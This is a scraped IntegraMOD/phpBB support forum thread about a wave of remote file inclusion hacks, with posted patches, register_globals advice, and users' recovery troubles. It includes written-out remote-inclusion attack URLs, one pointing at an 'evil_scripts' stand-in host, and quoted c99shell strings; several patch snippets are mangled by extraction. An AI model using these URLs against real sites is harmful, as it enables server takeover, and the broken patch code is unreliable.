IntegraMOD

[Michaelo]

Continue all discussion here... During the next few days I will move pertinent post from the open discussion to this members discussion forum...

For latest fixes and updates See next post... [Note the Date and Revision Number] at bottom of this post.

Mike

[Michaelo]

Patch: To protect from a recent remote hack please add the following patches...

Look here for the latest updates. Note I have added a revision number to this post so keep a eye on it

Note Setting register_globals Off is advisable... register_globals will disappear in php6...

By adding the standard check to determine if IN_PHPBB has been set you can remove the php_root_path testing and rely on this simple test... This will correct a few problems for people.
The only concern that remain is the php_root_path variable is not set if this file is called directly and while it could allow php_root_path it to be set to another external file the IN_PHPBB can not be set, this will result in 'die hacking'... This should be enough protection...

functions.php 2 fixes Rev 06

Code: Select all

 Open]) || (int)isset($HTTP_GET_VARS[STYLE_URL]) )     {         (int)$style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] ] );         if($style == 0) { die('Hacking attempt'); exit; }         if ( $theme = setup_style((int)$style) )         {             setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']);             return;         }     }         if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) )     {         $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style'];         if ( $theme = setup_style((int)$style) )         {             return;         }     }// Security update 02 September 2006 B ends //    

function_portal.php 1 fix Rev 05
[code]  Open]

functions_mods_settings 1 fix Rev 05
[code]  Open]

If you have been hacked, remove all unknown files, change you passwords for main admin, admins and moderators and upload files again from original source making sure the above fixes are added.

I am aware that people may have the above files with 2.0.21 updates installed so I am not attaching updates as my files probably wont match everyones...

Mike
Updated]Rev 006[/b]

[Unregistered]

anymore hacking reported after the final fix?

[Michaelo]

None so far... I hope every who was hacked does a proper cleanup else we wont know where we stand...

[twitchy]

Ive got one <img>

it actually only affects my album (so far ) wehn i try to access it it says

Hacking attempt... Details Logged

plz help

[Michaelo]

First:
Check you are using the edits above (post #2) remember they were updated to fix this type of problem....

Next: (if the above has been completed)
What are clicking? Hold cursor over the link and read the link property at bottom of browser... I need to know which file is being called.. you should see the link info including http://your_site_name/forum_name/album_ ... xxxxxxxxxx


Also you sig has a comma in the link should be a dot
Mike

[BMD]

I was hit again...this makes 6 times....

I was implementing the patches and went to upload via FTP and my entire site is gone this time.

not only that, but when I try to ftp a simple index to let my users know what is going on etc, i get a "critical transfer error"

I can't upload anything...

I called my host provider tech support and THEY can't even access anything

even a list command is giving them an error.

I just got off the phone with Tech Support....

something has wiped everything down to the root directory.

[BMD]

I just checked my MySQL database via Navicat....

Everything appears to be ok there as far as I can tell.

Thank God for small miricles.

[BMD]

Quick question

Can I make the edits for the security patches BEFORE I do the install again?

Will it cause a problem with the install?

I'd like to get all this done off line if possible, so that when the Techs get me on line again I can upload and deal with cosmetics of the site.

My site has an aviation weather forecaster that my users use to make flight go-no go decisions, and this is killing me.

Oh...
Since I'm starting pretty much from scratch again...
would i be better served installing phpBB2.0.21 and then doing a manual install of IM1.4.0 and the security patches?... Or IM and the manual upgrades of phpBB?

[Fubie]

BMD,

Yes, do the edits before uploading to the server.

[Fubie]

BMD,

Another thing. Change the name of your forum while doing the upload. If your forum directory is forum change it to pleasework, Then after every file is uploaded change the directory name to forum.

[BMD]

BMD,

Another thing. Change the name of your forum while doing the upload. If your forum directory is forum change it to pleasework, Then after every file is uploaded change the directory name to forum.

Fubie

I know how to do a safe install.... what I need to know is phpBB first and then the IM overlay?

Or

IM and upgrade the phpBB to 2.0.21

I really wish that they'd do the IM premod with the 2.0.21

The one on the site now still shows 2.0.17

that means multiple upgrades to get up to 2.0.21

VERY time consuming.

[Fubie]

BMD,

Please create a new thread for this topic. In it let me know if you are doing a clean install or upgrading from a live phpbb forum.

[computerz]

I'm going to attempt these patches now, and change my album and avatar folders to 777 so that they can work. Prior to doing so I will update my full backup.

I will update everyone here in a few days to let you know if I've been hacked again. It usually happens wthin a day or two after setting my avatar and album upload folders to 777. So we'll see.

[computerz]

Michaelo I see what your first patch is doing. Its preventing access to root level folders above the public_html.

However, I think you're missing the fact that they're not writing directly to the root folders until they first have access to write to the "upload" folders: (album_mod/upload & images/avatars)

These are folders, which when set to 777, the hackers upload Perl scripts (eggdrop IRC bots). Once they connect to the scripts in these folders, they then use suExec or some other means to assume root level priviledges.

So as you can see, I really believe these patches are futile, because once they get the perl scripts in the upload directories and connect to them and assume root priviledges, they can then bypass the integramod scripts altogether and destroy, rewrite, or whatever they want to do on the server as root.

We need a means to not only filter them from the root, but also from the upload directories.

I'm still going to apply these patches, but I'm not going to change my folder permissions just yet though.

[Vadar]

OK, I'm the ultimate novice on php, but I'm having the same problem that Twitchy described in the ACP under the Photo Album section. I went back in and verified that I had all of the latest fixes as per the second post installed (Rev 5).

While doing that I noticed something that looked strange to me. For the fix labled function_portal.php 1 fix Rev 05 I notice that it shows: die("Hacking attempt");

For the other fixes, Hacking attempt is in single quotes vice double quotes, like this:
die('Hacking attempt');

Is that right?

For Michaelo, here is what I get when I hover my cursor over the ACP - Photo Album - CLowN SP Config link: http://www.navyjrotc.us/portal/admin/ad ... hp?sid=xxx

[computerz]

OK, I'm the ultimate novice on php, but I'm having the same problem that Twitchy described in the ACP under the Photo Album section. I went back in and verified that I had all of the latest fixes as per the second post installed (Rev 5).

While doing that I noticed something that looked strange to me. For the fix labled function_portal.php 1 fix Rev 05 I notice that it shows: die("Hacking attempt");

For the other fixes, Hacking attempt is in single quotes vice double quotes, like this:
die('Hacking attempt');

Is that right?

For Michaelo, here is what I get when I hover my cursor over the ACP - Photo Album - CLowN SP Config link: http://www.navyjrotc.us/portal/admin/ad ... 149ade22d2

in the die function it should be double quotes

[Michaelo]

One of us is confused...

Before you can upload a file you either need ftp access or as a member you upload a file of allowed types (.gif, .png etc.). There is no other way for a hacker to put a file on a server assuming they havent hack another site on the server in which case they may be able to cross contaminateà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

To hack a site first you need a way in, to accomplish this you need to find a vulnerable point an exploit it, as with the recent hacks. The hackers used a remote file/script via the php_root_path weakness to execute a remote script allowing them accessà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ Once they gained access they proceeded to either upload files to gain control of the site or, as in most cases simply used a remote script hack tool to do thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

I have examined the possibility of restricting upload directories to only accept certain file such as images or zips in an effort to counter the cross contamination problemà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ more later on thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

Mike

[Michaelo]

It can be single or double they are both treated as strings... I hope! <img>

[computerz]

One of us is confused...

Before you can upload a file you either need ftp access or as a member you upload a file of allowed types (.gif, .png etc.).

I was under the assumption that the scripts already contain this input validation. Then if not, you're saying that in addition to an avatar or a photogallery image, I can upload .pl, .tlc, .c etc? Because these are the files that I find in these directories. A filter for .pl, .tlc, .zip, .tgz, and .c would definitely be in order, because these are the file extensions the hackers are uploading.

There is no other way for a hacker to put a file on a server assuming they havent hack another site on the server in which case they may be able to cross contaminateà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

I'm not sure about this. I've seen it where one can put fget(), wget, or fput() commands into the URI.. but since we have phpbb_security installed that should stop that unless of course hackers have discovered a workaround.

To hack a site first you need a way in, to accomplish this you need to find a vulnerable point an exploit it, as with the recent hacks. The hackers used a remote file/script via the php_root_path weakness to execute a remote script allowing them accessà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ Once they gained access they proceeded to either upload files to gain control of the site or, as in most cases simply used a remote script hack tool to do thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

agreed

I have examined the possibility of restricting upload directories to only accept certain file such as images or zips in an effort to counter the cross contamination problemà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ more later on thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

Great! Can't wait to see what you have. <img>

[Michaelo]

computerz, You as admin determine what can be uploaded it's in the ACP allow upload file type or something like that.

If you have any other file/script it is a result of hacking...
You cannot send any type of command via the address...

Play around with this little htaccess info and see how it goes...

Code: Select all

 <Directory>        # Allow access to the root of the hosting folder     Options None     AllowOverride None     Order allow,deny     Allow from all     <FilesMatch>    # But only to files with the specified extentions  Order allow,deny  Deny from all     </FilesMatch>     <FilesMatch>  Order allow,deny  Allow from all     </FilesMatch></Directory>  

The root is you forum root... If you get it working place it in all upload directories...
Mike

[Solomon]

The "other site" claims phpBB_security 1.0.3 will not stop the recent hacks but that CrackerTracker will. I have no clue, this is why I am asking. This has nothing to do with Michaelo's fixes.

[computerz]

computerz, You as admin determine what can be uploaded it's in the ACP allow upload file type or something like that.

ahhhh.. i forgot about that, but isn't that only for the attachment control panel for the forums. In other words do those restrictions also apply to the smartor Photogallery, and the avatar image uploads?

you cannot send any type of command via the address...

Thats good to know

Play around with this little htaccess info and see how it goes...

Code: Select all

 <Directory>        # Allow access to the root of the hosting folder     Options None     AllowOverride None     Order allow,deny     Allow from all     <FilesMatch>    # But only to files with the specified extentions  Order allow,deny  Deny from all     </FilesMatch>     <FilesMatch>  Order allow,deny  Allow from all     </FilesMatch></Directory>  

will most certainly!

And if we succeed with this, I'll be the first to throw in a nice donation for your hard work!

[Vadar]

Just an update....

I'm seeing the same problem as in the ACP - Photo Album (Hacking attempt... Details Logged) in the ACP - Extensions block. Neither problem is a result of a hack, but rather the file modifications made as per Rev 5.

[angisson]

yeah, I put the patches on my site.. and now my chat system (the chat scip from the 5 dollar script place , lol)


as long as my site is safe I can live iwth out th chat, but I am woundering how I would fix it?

[ihammo]

Now I am confused

I applied all the fixes as per Rev 5 and thought I would try the exploit on my site to see if it worked.

So, i popped http://my site/portal/includes/functions.php?php_root_path=http://www.testing123.com/test.html in to a browser and I did not get a "hacking attempt" message.

has anyone else tried this on their own site to see what happens? Until I can fix this I have taken my site offline completely

[ihammo]

Ok, I think I have worked it out. My provider has switched Register_Globals to OFF (without telling me!)

To test I replicated my site on a server at home and set Register_Globals to ON. With this the hacking code worked when trying the hack.

Then I set it to OFF and the hacking code didn't work, but the phpbb_root_path variable attempting to be passed in the URL was nowhere to be seen (i added code to display it in both circumstances)

So, with Register_Globals off is the functions.php exploit at all possible? I am guessing (hoping) not!

Thanks everyone!

[Solomon]

Now I am confused

I applied all the fixes as per Rev 5 and thought I would try the exploit on my site to see if it worked.

So, i popped http://my site/portal/includes/functions.php?php_root_path=http://www.testing123.com/test.html in to a browser and I did not get a "hacking attempt" message.

has anyone else tried this on their own site to see what happens? Until I can fix this I have taken my site offline completely

I get the same result with Register_Globals ON or OFF:

Warning: main(./includes/functions_categories_hierarchy.): failed to open stream: No such file or directory in /home/XXXXX/public_html/forum/includes/functions.php on line 38

Warning: main(): Failed opening './includes/functions_categories_hierarchy.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/XXXXX/public_html/forum/includes/functions.php on line 38
[hr:2q2wbgp0]
Is this what I should get?

[ihammo]

When Register_Globals was OFF I got the exact same response as you Soloman.

I added some extra code to the hacking code to display the root path that was being used and no matter what I did whilst Register_Globals was OFF I couldn't pass anything to functions.php via the URL.

However, when Register_Globals was ON, I would get the "hacking attempt. Details Logged" message when testing the URL

I take it you do have direct contol over the Register_Globals variable on your server and did check that it was ON or OFF? I created a simple php file with the code

Code: Select all

 <phpphpinfo>  

which I then navigated to in my browser to check that the Register_Variable had indeed changed. I run apache under windows on my test server and had to restart apache after changing the php.ini file (which needs to be in your windows directory I think - or apache does not seem to see it [but that could be my crappy set up of apache <img> ])

[Solomon]

When Register_Globals was OFF I got the exact same response as you Soloman.

I added some extra code to the hacking code to display the root path that was being used and no matter what I did whilst Register_Globals was OFF I couldn't pass anything to functions.php via the URL.

However, when Register_Globals was ON, I would get the "hacking attempt. Details Logged" message when testing the URL

I take it you do have direct contol over the Register_Globals variable on your server and did check that it was ON or OFF? I created a simple php file with the code

Code: Select all

 <phpphpinfo>  

which I then navigated to in my browser to check that the Register_Variable had indeed changed. I run apache under windows on my test server and had to restart apache after changing the php.ini file (which needs to be in your windows directory I think - or apache does not seem to see it [but that could be my crappy set up of apache <img> ])

I'm toggling it via my .htaccess file and then verifying it in the ACP/Tool and/or ACP/Security section. Local toggles ON & OFF accordingly, and Master always stays ON because this is my host's shared server default.

.htaccess file string for servers where Master is default ON:

Local OFF desired

Code: Select all

php_value register_globals 0

[ihammo]

Hmm.. Not really sure then tbh. I am no expert (especially with htaccess!) and we have already reached the limit of my knowledge <img> - everything I know I have learnt from trial and error building my one and only site!

Hopefully someone with a bit more know-how can help further (sorry!)

[tekguru]

Since installing this batch of fixes we've found:

- RSS Feeds no longer function
- M2F no longer sends out messages

These are really essentail to us, so anyone any ideas on how to fix them, or which of the Mods may need backing out to get them working again?

HELP!

[tekguru]

Fixed it - false alarm guys <img>

[tekguru]

Only one question though, how can we effect a style change without the functionality in there?

We use a 'Mobile' theme which a fair number of our users need to use and since adding the fixes in we are of course unable to change the style?

[Solomon]

Only one question though, how can we effect a style change without the functionality in there?

We use a 'Mobile' theme which a fair number of our users need to use and since adding the fixes in we are of course unable to change the style?

I've been told its ok to re-enable the Style Select block after you apply the fixes.

[Michaelo]

Style Change Block... The best way is to test it...

With or without register globals being off it should be OK, however run a test as you have been and prove it for yourselves... The edits work for me and I have tried all know hacks to get past it...

If your provider has registered globals on get them to turn them off... not only are they not needed they will be removed soon enough... If my provider has them on and would not turn them off I would move providers... <img>

[Vadar]

For Mike: With all of the changes applied, I have quite a number of pages within the ACP closed down with the hacking attempt message. I can no longer even click on PhP Info (Tools block) without getting that message.

My question is, is this normal with these fixes applied or have I done something wrong?

Thanks

[Michaelo]

Re check the functions.php edits and if still blocked from a page post the first ten line of that page...
Mike

[tekguru]

Right, silly Q, but how do we turn back on the style changer?

[sasan]

hi guys in 2 week we cane find 4 bugs in integramod portal this bugs whit high risk this form have 5 bug xss and sql injection i can put here until repair but this bug not very importent ! until new bug found this metod name is remot File Inclusion Vulnerabilities whit this bug you can run any php script frome a diferent server such this link
http://www.exmaple.ir/frame.php?body=ht ... 287.txt%3F ( i change domain name but if want i can get a true link!!) see this lins
include_once ($chemin."conf/code.php")
its one line of mod_phpalbum in Portail PHP its have a bug and file inclusion!!! now hacker can access any shell on this server whit this link

http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?
in integramod also 4 files have this problem !!
functions_mod_user.php
functions.php
functions_portal.php
i very search and rad line by line on integra files but i can find any dangres bug on this files !!! they have some bug whit low risk but may any hacker can find new bug!!!!!! i dont say integra dont have bug but i try and dont can any dangerus bug!! now if you want dont hack !! whit same method can use cpanel and set permision on your includs folder ! admin folder ! and any folder you think need protect whit password! whit this if your forum have a bug until hacker dont have your password peotect cant do anything!!

[Fubie]

That's excellent information sasan!

Was this done for IM 140 or IM141 beta?

We will be releasing RC4 which will be a post hack fix test release soon. I'm curious to see how well that will stand up especailly after all the long hours Mike put into it.

[computerz]

Hey so far so good guys.. i've applied the changes and haven't been hacked...... yet....... i've set 777 permissions on upload folders since yesterday. The hackers usually get me within a week of doing so, so I'll give it another week and if I dont hear from the hackers, I'll say that it worked.

But its good to know that Michaelo tried to hack it himself and couldn't get buy it.

@Michaelo,

you mean you tried to remotely upload files to the 777 directories right, while not logged on as a user right?

I hope you tested for this, because the hackers who hacked my site were not logged on. I assume they copied my source and altered the forms or something, but in any case they were able to get perl scripts and .zip files in my upload folders.

[Michaelo]

The two files used in the above hack are not part of 1.4.0 or 1.4.1, so I assume these are part of a mod that some people have added... Unfortunately I can test them... therefore I can fix them... <img>

[Vadar]

Mike: Thanks. I went back in with a clean functions.php, verified that the problem went away, then added the fixes again, a bit more carefully this time... <img>

Problem solved.

[Michaelo]

No worries Vadar... If I had a penny for every time I did that I could buy a new car <img>

[adbasque]

Hello everybody

first of all thanks to you all, for treating this subject and got everybody involved, as i posted previously i had my website hacked couple a days ago, this is the very first time it happened to me, i had websites for over 13 years now, i must admit i was a bit shocked, when i discovered that all my db was wiped out.

so my question is if we discuss here on this forum, about hacking etc.. and first of all it's sad to use this term "hacking" for these idiots whom are enjoying themselves to destroying, cause a real hacker builds doesn't destroy, if we discuss here and we are given security patches etc.. how can we make sure that the hackers are not actually members here, so they get the answers too, which means they can find ways aroud these security patches, <img>

(i also noticed that any integramod site i went to visit including mine, i found them very very slow they drag)

i use 10MB connexion and still as if i am using a dial up when i am surfing sites "Integramod" is it me or is it a fact? i don't have problems with other sites except integramod, not even with phpbb boards.

i am rebuilding my new site, downloaded Integramod 140, running phpBB 2.0.17, is there a way to upgrade to the new versions straight from phpBB 2.0.17 to phpBB 2.0.21?



i always get this message "Your Daily Database Backup Failed"
how can i fix this please, because it's mainly security updates?

Please help, i don't want to go through this again, it took me almost a year to get my site finally looks like a real website, and this ***** destroyed it in few minutes or hours.

I know that who ever hacked my site used an sql injection, how can we protect ourselves against such attacks please? and finally i read about "register globals being on or off" where exactly do i need to turn it on and off?
Thank you all for your hard work!!

[Dioncecht]

Code: Select all

Hello everybody  first of all thanks to you all, for treating this subject and got everybody involved, as i posted previously i had my website hacked couple a days ago, this is the very first time it happened to me, i had websites for over 13 years now, i must admit i was a bit shocked, when i discovered that all my db was wiped out.  so my question is if we discuss here on this forum, about hacking etc.. and first of all it's sad to use this term "hacking" for these idiots whom are enjoying themselves to destroying, cause a real hacker builds doesn't destroy, if we discuss here and we are given security patches etc.. how can we make sure that the hackers are not actually members here, so they get the answers too, which means they can find ways aroud these security patches,  ]

The problem is, you can't really tell if you have a  hacker here lurking and analyzing the code or whatever, but the devs always try to create a package without big gaping holes in the first place.  Since thats nearly impossible, the only real defense we have is having guys like the devs here who are quick to identify and patch holes.  Also the community here is always trying to help the devs out, so that makes thier life a little easier.

[code]  (i also noticed that any integramod site i went to visit including mine, i found them very very slow they drag)  i use 10MB connexion and still as if i am using a dial up when i am surfing sites "Integramod" is it me or is it a fact? i don't have problems with other sites except integramod, not even with phpbb boards.[/code]

Integramod is big with lots of mods.  Alot of times a faster host like mine can take some of the sluggishness out, but the fact still remains, IM is really big with lots of features.  As the development goes on, I am sure they are taking load times and number of queries into consideration and looking for ways to reduce them.  If you take a vanilla phpBB and mod the hell out of it, you'll get the same effect.  As the number of queries increase, so does the load on the processor and as a result, the speed starts to suffer.  Problem is, when you start changing code to adjust one thing, it has an effect on many other things, so it's a delicate process tinkering with it


[code]i am rebuilding my new site, downloaded Integramod 140,  running phpBB 2.0.17, is there a way to upgrade to the new versions straight from phpBB 2.0.17 to phpBB 2.0.21?[/code]

Nope.. .17 -> .19  security patch 1.0.2 -> 1.0.3  -> .20 -> .21 .... in that order



[code]i always get this message "Your Daily Database Backup Failed"how can i fix this please, because it's mainly security updates?[/code]

One of the updates fixes that.. not sure which one


[code]Please help, i don't want to go through this again, it took me almost a year to get my site finally looks like a real website, and this ***** destroyed it in few minutes or hours.  I know that who ever hacked my site used an sql injection, how can we protect ourselves against such attacks please? and finally i read about "register globals being on or off" where exactly do i need to turn it on and off?Thank you all for your hard work!!

I'll let Michaelo answer that one.. I dont remember.. I think it's a statement in the .htaccess?

[evolver]

Please help, i don't want to go through this again, it took me almost a year to get my site finally looks like a real website, and this ***** destroyed it in few minutes or hours.

The best advice for every system:
ALWAYS TAKE BACKUPS!!!
...and keep them in a safe place (not on the server)

That's always be the most secure way of protecting your work against destruction...

But I know...
People tend to forget about that...especialy when nothing bad seems to happen for a long time...
But everybody knows that bad things happen most when it's not expected anymore...

[computerz]

[code]so my question is if we discuss here on this forum, about hacking etc.....we are given security patches etc.. how can we make sure that the hackers are not actually members here, so they get the answers too, which means they can find ways aroud these security patches,  ]

The patches given here are merely input filters, in this case very good ones. So its nothing they can do about it unless they manage to rewrite PHP or find a completely different vulnerability. So I wouldn't worry too much about their seeing the patch.

[evolver]

I know that who ever hacked my site used an sql injection, how can we protect ourselves against such attacks please? and finally i read about "register globals being on or off" where exactly do i need to turn it on and off?
Thank you all for your hard work!!

I have looked at some hackers scripts...
SQL injection is something they are working on...
Their scripts are already testing this, but it's not fully supported yet.

Yes, they have support for this too
Attacks come from Script-Kiddies who don't know much about coding themselves, they just use prepared scripts and have support for these things as well...

In their scripts I've found lines like these:

Code: Select all

Attention! SQL-Manager is NOT ready module! Don't reports bugs.

Code: Select all

But, you can't connect to forum sql-base, because db-software="".$dbms."" is not supported by c99shell. Please, report us for fix.

Code: Select all

If you think, it is mistake, please send us url and dump of $GLOBALS.

It's very obvious that they are not working alone...

[Michaelo]

True, and worrying but same as beforeà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦
Backup failure... need to know if you are using Windows or Linux server here as the backup method may require alterations but as evolver alludes to in his post, Manual back up from time to time (monthly/weekly) to you local machine is very of paramount importanceà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

The current automatic backup is intended for normal restoration and simple breakdowns and not for restoration after hackingà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ i.e. some hacker are quite capable of removing your automatically backup files so a local copy is neededà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦

Mike

[adbasque]

I have looked at some hackers scripts...
SQL injection is something they are working on...
Their scripts are already testing this, but it's not fully supported yet.

Yes, they have support for this too
Attacks come from Script-Kiddies who don't know much about coding themselves, they just use prepared scripts and have support for these things as well...

I totally agree with you, a real hacker will not spend his/her time hacking into people's websites, real hackers create, help people, and most of the time they help people protect their organisations and so on.

These idiots, they get ready made scripts and some instructions, but the truth is, which ever technique they use, they haven't got a clue, what's happening after they launch the script. they simply start the script with the set of instructions, and they call themselves hackers, Big "Joke".
yes they are destructive, but idiots if anybody writes a script and hacks peoples sites, even though i don't like what he is doing but, i will show him some respect, but these guys are parasites.

Anyway, thanks for all your hard work and we will not let them beat us.
I personally think that the Goverments world wide, should really crakc down on these viruses, i call them viruses personally. and please don't tell me they can't because i know they, they find excuses, as if it's very costly to track them down, i think it's loads of B***. go and hack into a bank and you''ll see if they don't turn up the next morning <img>

Anyway lol i don't want to turn this into a political debate,
Thanks again guys for all you hard work, help and support.

[Michaelo]

Sorry tekguru... missed you question... there should be no need to turn off Style Select now... Be safe turn off Registered Global if you can...

[tekguru]

Hi michaelo, cheers for replying, the Style blocjk has been turned back on for Admins only for testing but even though the hacks are in place correctly I still get a 'Hacking attempt' warning whilst trying to use any style change.

The style change we need working is on the main top menu instigated via QBar entries:

http://www.4winmobile.com/portal.php

Registered Globals has always been turned off on the server.

Any ideas which file I need to start looking at?

Really need help to get this working as otherwise my PDA using users can't use the mobile version of the site to access.

[Michaelo]

Confirm the functions.php edit are as per 2nd post here (second edit in functions.php)...

[sasan]

hi my friend i test your site and i most say your site have a buge!
Warning: main(./includes/functions_categories_hierarchy.): failed to open stream: No such file or directory in /home/windows/public_html/includes/functions.php on line 37

Warning: main(): Failed opening './includes/functions_categories_hierarchy.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/windows/public_html/includes/functions.php on line 37

if register global is on your site no hacking!! pleas fix this bug on your forum thx sasan

[dan0042]

[quote=""Michaelo";p="14453""]Patch: To protect from a recent remote hack please add the following patches...

Look here for the latest updates. Note I have added a revision number to this post so keep a eye on it

Note with this fix you do not need register_globals off however setting to OFF is advisable... register_globals will disappear in php6...

functions.php 2 fixes Rev 05a

Code: Select all

 Open]) || (int)isset($HTTP_GET_VARS[STYLE_URL]) )     {         (int)$style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] ] );         if($style == 0) { die('Hacking attempt'); exit; }         if ( $theme = setup_style((int)$style) )         {             setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']);             return;         }     }         if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) )     {         $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style'];         if ( $theme = setup_style((int)$style) )         {             return;         }     }  

function_portal.php 1 fix Rev 05

Code: Select all

 Open]

functions_mods_settings 1 fix [color=red]Rev 05[/color]
[code]  Open]

[color=green]If you have been hacked, remove all unknown files, change you passwords for main admin, admins and moderators and upload files again from original source making sure the above fixes are added.[/color]

I am aware that people may have the above files with 2.0.21 updates installed so I am not attaching updates as my files probably wont match everyones...

Mike
[color=red]Updated]Rev 006[/b][/color][/quote]
[code]Find]) || (int)isset($HTTP_GET_VARS[STYLE_URL]) )    {       (int)$style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] : (int)$HTTP_GET_VARS[STYLE_URL] );       if($style == 0 || $style > 49) { die('Hacking attempt'); exit; }       if ( $theme = setup_style($style) )       {          setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']);          return;       }    }        if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) )    {       $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style'];       if ( $theme = setup_style($style) )       {          return;       }    }  

Dont see that one its missing

[Drop-Forged]

hi my friend i test your site and i most say your site have a buge!
Warning: main(./includes/functions_categories_hierarchy.): failed to open stream: No such file or directory in /home/windows/public_html/includes/functions.php on line 37

Warning: main(): Failed opening './includes/functions_categories_hierarchy.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/windows/public_html/includes/functions.php on line 37

if register global is on your site no hacking!! pleas fix this bug on your forum thx sasan

If that is copied correctly it looks like you are missing $phpEx on that line.

Open includes/functions.php,

find:

Code: Select all

includes/functions_categories_hierarchy

Replace entire line that is in with ]include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );[/code]

That should resolve that issue.

[color=red]Note] To be clear, replace the entire line of code with the one I gave you, in the end those 4 lines should look like:
[code]  //-- mod ]

[Michaelo]

I have update the security fixes and removed the php_root_path test as the standard IN_PHPBB should be enough to block hackers... I would prefer to initialise all variables use in a file rather than disallowing access based on a external definition however the simple solutions is easier and removes problems that affected others while at the same time blocking the hackers...

It still remains bad programming practice to have uninitialised variables in a file but we have no option. <img>

[url=http]See post for details...[/url]

Mike

[Michaelo]

Just a note re syntax...

If you see code like Find:
includes/functions_categories_hierarchy...
This indicates only partial text in find, that is the line to find start with includes/functions_categories_hierarchy but is longer.

dan0042
I will redo this post to clarify what I intended but basically the code at the bottom goes between the
// BEGIN Style Select MOD

(REPLACE this with code)

// END Style Select MOD

comments ie replace this: (all code between these comments) with the code at the bottom...

Mike

[dan0042]

Thanks top man

[evolver]

I will redo this post to clarify what I intended but basically the code at the bottom goes between the
// BEGIN Style Select MOD

(all code between these comments)

// END Style Select MOD

comments ie replace this: (all code between these comments) with the code at the bottom...

Mike

It's obvious for coders, but I think that this can indeed mislead many users...
I mean by replacing
(all code between these comments) with
(REPLACE all code between these comments)
The word REPLACE will catch the eye...

[Michaelo]

<img>

[adbasque]

and finally i read about "register globals being on or off" where exactly do i need to turn it on and off?
I'll let Michaelo answer that one.. I dont remember.. I think it's a statement in the .htaccess?

Thanks for trying to help me, i found out where to turn it on and off
in php.ini, and there are few options aswell you can turn on and off such as safe mode etc.. of course providing you are running your own server, but if you are using a hosting service, then you probably need to ask them, cause i believe you won't have access to php.ini, as for the .htaccess file, i know you can deny or allow certains things but i am not sure if you can turn on and off the register_globals.

I do have one question though i run ssl would that help as an extra layer of security or wouldn't it make any difference?
i don't think it would make a difference personally because most of these so called hackers use mostly sql injections which a completely different route they take to access to your database and files.

I do have couple hacking scripts, such remote injection exploit, i can post them, but i don't want them falling in the wrong hands, so if it would help the Devs, i can probably post half of each script.

that would probably help them.
let me know if you guys want to have a look at them.

Best regards to you all

[tekguru]

Confirm the functions.php edit are as per 2nd post here (second edit in functions.php)...

They are but the problem is still there unfortunately. Any way I can email you the file for you to take a quick look at it?

[adbasque]

Hi Tekguru

I am sorry, but who was your reply to loll
<img> ?

If it was meant to someone else my apologies lol

Take care

[tekguru]

It was meant to be to Michaelo.

No since making the rev 06 fixes to functions.php I'm getting users reporting:

"The 4WM home page just has a message box under the normal 4WM header saying à¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€¦Ã¢â‚¬Å“Could not find style name 0.à¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€š

[tekguru]

My 'problem' causing file is online at:

http://www.4winmobile.com/func_prob.zip

Hope someone can help!

[tmotley]

i know you can deny or allow certains things but i am not sure if you can turn on and off the register_globals.

I'll vouch for it being possible. Putting

Code: Select all

php_value register_globals 0

in my .htaccess file sets my local value to No while the master value obviously stays unchanged. (Just looking in phpinfo)

All recent security edits in place and register globals off combined with daily backups and I'm breathing easier.

[Michaelo]

[quote=""tekguru";p="14841""]
It was meant to be to Michaelo.

No since making the rev 06 fixes to functions.php I'm getting users reporting:

